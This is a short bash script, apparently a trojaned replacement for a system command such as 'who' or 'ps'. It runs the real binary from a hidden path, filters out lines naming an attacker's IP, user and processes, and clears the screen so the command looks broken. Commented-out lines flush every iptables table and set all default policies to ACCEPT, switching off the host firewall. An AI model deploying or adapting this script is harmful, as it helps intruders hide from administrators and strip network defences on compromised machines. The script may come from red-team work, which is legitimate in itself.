#!/bin/bash

# Execute real 'who' command and don't display anything. Also mess with them
# This will make them think they are the only one connected to the box
# Clear the screen as well to make the command appear broken
/lib/module_ps $@ | grep -Ev "IP_TO_HIDE|USER_TO_HIDE|PROC_TO_HIDE" && clear

# Source the ~/.bashrc
source ~/.bashrc

# Flush iptables rules
#sudo iptables -F
#sudo iptables -t mangle -F
#sudo iptables -t nat -F
#sudo iptables -t filter -F
#sudo iptables -t raw -F
#sudo iptables -t security -F

# Change default policies for 'iptables'
#sudo iptables -P INPUT ACCEPT
#sudo iptables -P OUTPUT ACCEPT
#sudo iptables -P FORWARD ACCEPT

